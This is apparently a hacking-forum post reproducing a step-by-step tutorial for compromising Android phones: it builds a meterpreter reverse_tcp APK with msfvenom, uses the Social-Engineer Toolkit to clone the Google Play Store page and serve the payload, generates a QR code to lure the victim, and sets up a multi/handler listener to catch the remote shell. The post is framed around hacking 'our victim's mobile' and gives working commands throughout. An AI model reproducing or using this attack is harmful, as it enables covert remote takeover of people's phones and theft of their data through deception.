• We just launched and are currently in beta. Join us as we build and grow the community.

Hack Android Phone using HTA Attack with QR Code

Bitch

Steganography Expert
Divine
B Rep
0
0
0
Rep
0
B Vouches
0
0
0
Vouches
0
Posts
161
Likes
85
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
QR Code is a 2-dimensional barcode which can be scanned using Smartphones or dedicated QR Readers. These QR Codes are directly linked to contact numbers, websites, usernames, photos, SMS, E-mails and even encryptions but they do not end here. QR Codes are big deal in Japan and it’s just a matter of time when taking over the whole world as there is growth in SEO.

Till now every one of you must have understood that QR Codes is the ‘next big thing’, let’s make it a big thing but in regards to hacking. Yes! In this article, we are going to hack our victim’s mobile in some easy steps using QR Code. And all you need for this is your beloved Kali Linux.

Our step is to create a pernicious file using msfvenom.

Code:
msfvenom –p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=6666 > /root/Desktop/Launcher.apk

1.png


Now open SET. Through SET we will alter HTA attack into an APK attack to gain access of the victim’s Smartphone. Thus, from the SET menu select the 2nd option which indicates Website Attack Vectors?

2.png


Then further select 8th option which refers to HTA Attack Method.

3.png


And then select Site Cloner by typing 2.

4.png


When you type the said 2 option, it will ask you to enter the URL that you want to clone. Here give the URL of the play store: https://play.google.com/store

5.png


Then when it asks you to select meterpreter option type 3 as we want to select reverse_tcp.

6.png


Furthermore, save the launcher.apk file that you created using msfvenom to /var/www/html/

7.png


Also the change the name of launcher.hta to lancher.apk that your SET had just created as shown below

8.png


Now add The QR Code Extension to your chrome.

9.png


10.png


The QR Code Extension wills generate a QR Code for you according to your attack.

11.PNG


Now start multi/handler so you have your session in time and for this type:

Code:
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 6666
run

12.png


Now you can move ahead and make the victim scan your code. And install the app.

13.png


And Voila!! As soon as scanning of the code will be completed, you will have your meterpreter session.

14.png


Author: Shivam Gupta is An Ethical Hacker, Cyber Security Expert, Penetration Tester, India. you can contact here
 

440,010

316,559

316,568

Top